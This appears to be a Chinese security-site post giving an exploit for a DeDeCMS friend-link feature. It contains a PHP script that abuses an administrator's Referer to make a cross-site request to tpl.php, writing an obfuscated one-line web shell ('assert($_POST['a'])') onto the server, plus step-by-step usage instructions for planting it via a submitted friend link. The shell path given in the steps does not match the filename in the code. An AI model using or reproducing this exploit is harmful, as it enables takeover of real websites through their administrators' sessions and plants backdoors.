本文由 发布,转载请注明出处,如有问题请联系我们! 发布时间: 2021-05-14DeDeCMS友链Getshell
加载中【摘要】漏洞详情:http://0day5.com/archives/4209/EXP:<?php//print_r($_SERVER);$referer=$_SERVER['HTTP_REFERE...
漏洞详情:
http://0day5.com/archives/4209/
EXP:
<?php//print_r($_SERVER);$referer = $_SERVER['HTTP_REFERER'];$dede_login = str_replace("friendlink_main.php","",$referer);$muma = '<'.'?'.'a'.'s'.'s'.'e'.'r'.'t'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'a'.'\''.']'.')'.';'.'?'.'>';$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';$url = $dede_login.$exp;//echo $url;header("location: ".$url);// send mail coderexit();?>使用方法:
1.保存上方exp,上传至服务器;
2.访问目标网站:http://www.test.com/plus/flink.php
链接填写部署的exp的URL;
3.等待管理员触发,得到shell地址http://www.test.com/include/taglib/dy.lib.php